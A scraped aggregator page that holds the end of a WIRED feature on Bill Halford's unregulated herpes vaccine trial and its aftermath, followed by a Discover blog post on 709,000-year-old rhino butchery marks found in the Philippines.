Madden also took note that Peter Thiel, the legendary early investor in Facebook, was also interested in Rational Vaccines. Thiel is known for contrariness and taking arms against regulation and norms. A libertarian, he has criticized the FDA, calling the agency too restrictive and questioning whether an innovation like the polio vaccine could be achieved today.

“It caught my attention that Peter Thiel had done an incredible amount of due diligence on this,” Madden says. (Fernandez says he was first introduced to Jason Camm, the chief medical officer of Thiel Capital, by Paul Bohm, in early 2017. Camm was present at the April symposium, according to Fernandez, but Thiel was not.)

“I had to take a chance. Dr. Bill was dying. Nobody wanted to speak up, so I was like, ‘I’ll do it.’ ”

Madden also was moved by the testimony of a trial participant named Rich Mancuso, who attended the symposium. Mancuso has red hair and a puckish smile. He was working as an exterminator in New Jersey when he first met Halford online. He had been infected with herpes for more than 20 years, and though the symptoms waxed and waned, he experienced outbreaks as often as twice a month on his genitals and face. Mancuso told Madden about the humiliation of living with inflamed facial sores and the financial toll of paying for antiviral medicines. Dating was nearly impossible, and one rejection in particular brought him to the verge of suicide. Since receiving three shots of Halford’s vaccine, however, he had intervals of several months without the blistering sores. In gratitude, Mancuso chose to speak publicly to make his support more credible. “I had to take a chance,” he told me. “Dr. Bill was dying. Nobody wanted to speak up, so I was like, ‘I’ll do it.’ ”

With strong interest from investors—and at least one public success story—the company’s fortunes appeared to be ascendant. Halford’s health, however, was spiraling downward. By May 2017, it was no longer possible for him to work. And by early June, it was clear that he was close to death.

Halford had a jade necklace that he wore at all times, “like a talisman, to remind him to seize the day,” Melanie says. He got it a couple of years after his diagnosis, on a family trip to New Zealand. On June 22, he placed the necklace on his nightstand; when Melanie saw it there, she realized it was his way of saying, “I’m giving this up now.”

In August, two months after Halford’s death, the company received a total of $7 million from investors, Fernandez says, including $4 million from Thiel funds. At nearly the same time, however, Kaiser Health News broke the story that Halford had carried out a clinical trial with no guidance from the FDA or an institutional review board. The dean of Southern Illinois University’s School of Medicine had once referred to Halford as a “genius,” and the school had promoted his vaccine work on its website. But when details of the Saint Kitts research emerged, the university quickly distanced itself, saying that the institution was unaware of the trial’s oversight issues until after the work was done.

The university has acknowledged that there were serious problems with Halford’s work, and its medical school has halted all herpes simplex virus research. A spokesperson confirmed that “the government is conducting an investigation, and we are fully cooperating.”

Rational Vaccines is trying to weather the storm. As CEO, Fernandez is now charting a new course for the company, leaning on a recently hired chief technical officer as well as his investors. Madden says he first learned of the hotel-room injections and lack of oversight in Saint Kitts from news reports and admits he is troubled by what he heard. At the same time, “I don’t want to give opinions about this scientist that I revere,” he says, referring to Halford. “Was it done the right way? No.” But he said that now the company would comply with “the highest standards of gathering data.” Fernandez says Thiel Capital is also encouraging Rational Vaccines to conduct Phase I trials to follow FDA protocols. Camm, the chief medical officer at Thiel Capital, is “really one of the driving forces behind this whole thing,” Fernandez says. “If it were up to him, we’d be at the FDA already. I’m the one saying, ‘Let me get all the ducks in a row.’ ”(Neither Camm nor Thiel responded to numerous requests for interviews. )

The US market is lucrative and large, and “if you want to sell a treatment in the US, you have to play by US rules,” says Greely, of Stanford Law School. “I don’t care how libertarian you are.”

That doesn’t mean that the company will have an easy time with the FDA, which will likely ask to see all the data from Saint Kitts, as well as the lab notes for the animal studies. “The FDA will go back and look at the records, and if they’re not in order, they can’t be used,” says Robert Califf, a former commissioner of the agency. Still, if the company can convince the agency that the vaccine looks promising in animals—and that it is prepared to follow the rules—the agency is likely to allow further research. The FDA’s goal is not to punish, Califf says, speaking generally. “If there’s a good product and a bad company, the role of the FDA is to help get the good product through the system.” (The FDA declined to comment.)

Of course, more often than not, products that seem exciting in preclinical work fail in subsequent rounds of testing. Plenty of potential herpes vaccines, both preventive and therapeutic, have disappointed researchers in late-stage animal testing or in clinical trials over the years. “I think collectively we’ve all thrown the kitchen sink” at herpes efforts, says Clark, of Genocea. “It’s a hard virus, it really is.”

For months after she received the injections in Saint Kitts, Erkelens struggled to take her son to school, then often lay in bed for the rest of the day, unable to move. She continues to experience relentless tremors and intermittent nerve pain. “Nobody knows what’s going on,” she says.

Trial participants who felt better after the vaccination have a different concern: future access to the vaccine, both for themselves and others who are suffering. Rich Mancuso says he has not had an outbreak in more than a year but worries that if his symptoms do return, he won’t be able to get a booster shot—an option that Halford discussed with him. Carolyn says her symptoms disappeared for more than two years but “slowly started creeping back.” Now she gets occasional nerve pain, lasting a few minutes. “Most of the time it’s bearable, but I have been woken up in the middle of the night a few times as it got severe.”

Erkelens has hired a lawyer and is suing Rational Vaccines in state court for negligence and lack of informed consent. (Her lawyer argues that the document she signed before the trial did not fully represent the risks of the vaccine.) One other trial participant and one person who received hotel-room injections from Halford in 2013 have also filed suit against the company. (Rational Vaccines declined to comment on any legal proceedings.)

Before Halford died, Erkelens says, he called her “over and over and over” to see how she was doing. Halford always tried to understand the pain of the participants in his study; his empathy was part of what drew them to him. Yet it was perhaps his own suffering that made him blind to the larger implications of his actions. In what felt like the final insult, Erkelens said she had to reveal her identity in order to proceed with the lawsuit. It was an agonizing choice. Herpes had always felt like a mark of dishonor, and now it threatened to stain her public reputation as well. In the days after she filed the lawsuit, she set the wheels in motion to change her name.


Amanda Schaffer(@abschaffer) is a science writer based in Brooklyn, New York.

This article appears in the May issue. Subscribe now.

Listen to this story, and other WIRED features, on the Audm app.


Research and Ethics

Hominin head-scratcher: who butchered this rhino 709,000 years ago?

$
0
0
Researchers say cut and percussion marks on a rhino suggest a hominin presence in the Philippines more than 700,000 years ago, ten times earlier than previously known. (Credit Ignicco et al 2018, 10.1038/s41586-018-0072-8)

Researchers say cut and percussion marks on a rhino suggest a hominin presence in the Philippines more than 700,000 years ago, ten times earlier than previously known. (Credit Ignicco et al 2018, 10.1038/s41586-018-0072-8)

More than 700,000 years ago, in what’s now the north end of the Philippines, a hominin (or a whole bunch of them) butchered a rhino, systematically cracking open its bones to access the nutritious marrow within, according to a new study.

There’s just one problem: The find is more than ten times older than any human fossil recovered from the islands, and our species hadn’t even evolved that early.

Okay, so, maybe it was an archaic hominin, you’re thinking, maybe Homo erectus or some other now-extinct species. But there’s a problem with that line of thought, too.

According to the conventional view in paleoanthropology, only our species, Homo sapiens, had the cognitive capacity to construct watercraft. And to reach the island where the rhino was found, well, like Chief Brody says, “you’re gonna need a bigger boat.”

So who sucked the marrow from the poor dead rhino’s bones? It’s a whodunit with the final chapter yet to be written.

A single foot bone that’s about 67,000 years old is currently the oldest human fossil found in the Philippines (fun fact: the bone was found in Callao Cave, not far from Kalinga, the site of today’s discovery).

For more than half a century, however, some paleoanthropologists have hypothesized that hominins reached the archipelago much earlier. The pro-early presence camp has cited stone tools and animal remains originally excavated separately in the mid-20th century, but critics have noted there’s no direct association between the tools and bones, and the finds have lacked robust dating.

The larger obstacle in the eyes of the anti-early presence camp is all wet.

At numerous times in our recent history, geologically speaking, falling sea levels have exposed land surfaces now underwater, connecting islands and even continents to each other. The land bridge of Beringia is perhaps the most famous, joining what’s now Alaska with Russia at several points in time.

Land bridges were a thing in the broad span of geography between China, Southeast Asia and Australia, too.

An example of how much land can be exposed during periods of sea level drop. A team of researchers not involved in today's study created this map in 2015 as a paleogeographical reconstruction of Palawan Island, in the Philippines. The site mentioned in the new research is from the northern part of Luzon, top center of the map. (Credit Robles, Emil, et al. "Late Quaternary sea-level changes and the palaeohistory of Palawan Island, Philippines." The Journal of Island and Coastal Archaeology 10.1 (2015): 76-96.)

An example of how much land can be exposed during periods of sea level drop. A team of researchers not involved in today’s study created this map in 2015 as a paleogeographical reconstruction of Palawan Island, in the Philippines. The site mentioned in the new research is from the northern part of Luzon, top center of the map. (Credit Robles, Emil, et al. “Late Quaternary sea-level changes and the palaeohistory of Palawan Island, Philippines.” The Journal of Island and Coastal Archaeology 10.1 (2015): 76-96.)

These lost land bridges made it possible for animals — including humans and other members of our hominin family — to expand into places that are now island nations, such as Indonesia. But although the Philippine archipelago once had more real estate, several of its islands were never joined to the mainland. And that’s where today’s mystery begins.

Stones and Bones

Researchers working at a site in the northern part of the island of Luzon report the discovery of 57 stone tools found with more than 400 animal bones, including the mostly-complete remains of a rhino (the now-extinct Rhinoceros philippinensis, a poorly known subspecies… having a specimen that’s about 75 percent complete is an achievement in and of itself).

Using the electron-spin resonance method on its tooth enamel, the team established that the rhino was about 709,000 years old. Thirteen of its bones, according to the study’s authors, showed signs of butchering, including cuts and “percussion marks” on both humeri (forelimb bones), which is typical of smashing open a bone to access the marrow.

Alas, none of the bones found belonged to a hominin, which not only could have told us the butcher’s identity but also confirmed that butchering took place.

If you’re thinking it sounds kind of familiar to read a Dead Things post about apparent stone tools beside an animal that appears to have been butchered at a time and place out of sync with the human evolution timeline, well, you’re not wrong.

You may recall, about a year ago, the not-insignificant hullabaloo that erupted over claims that a hominin had processed a mastodon carcass in what’s now Southern California 130,000 years ago — more than 110,000 years before humans arrived on the continent, according to the conventional timeline. The skeptical pushback about the Californian find continues, most recently in February in Nature, and the claim is unlikely to be taken seriously unless a hominin fossil turns up.

Today’s discovery at Kalinga is in many ways just as convention-busting, though the tools at the site appear more obviously shaped by a hominin than those at the California site. Let’s accept that Kalinga is indeed a butchering site, where at least one hominin processed the carcass of at least one animal. Then the question becomes: which hominin?

The Unusual Suspects

There is no evidence that H. sapiens is anywhere close to 700,000-plus years old. Although researchers are pushing back the timeline for our species’ emergence, even the most out-there genetic modeling places the dawn of our species at no more than 600,000 or so years.

What’s more, the oldest fossils classified as H. sapiens, from Jebel Irhoud in Morocco, are about 300,000 years old, and even calling them H. sapiens has been contentious. Although the face appears strikingly modern, the lower, more elongated shape of the Jebel Irhoud hominin brain case suggests that the individuals had a smaller cerebellum, lacking the advanced cognitive skills of modern humans.

In fact, only anatomically modern humans like you and me have ever scampered about boasting such big, fancy brains, with an oversized cerebellum that makes us stand out in a hominin lineup.

Because the cerebellum is linked to creativity and fine motor skills, among many other functions, the fact that Neanderthals and other hominins had smaller versions is one of the reasons many researchers believe only H. sapiens has been capable of complex processes…processes such as building a boat and getting it across water from Point A to Point B.

It’s reasonable to rule out H. sapiens at Kalinga, as well as Neanderthals and Denisovans, who also had not yet evolved.

But that leaves only archaic hominins, such as H. erectus or another as yet unknown member of our family tree, able to boat across open water to Luzon. We won’t know for sure who enjoyed a snack of rhino marrow some 709,000 years ago until we find their bones.

The findings were published today in Nature.

Viewing all 25817 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>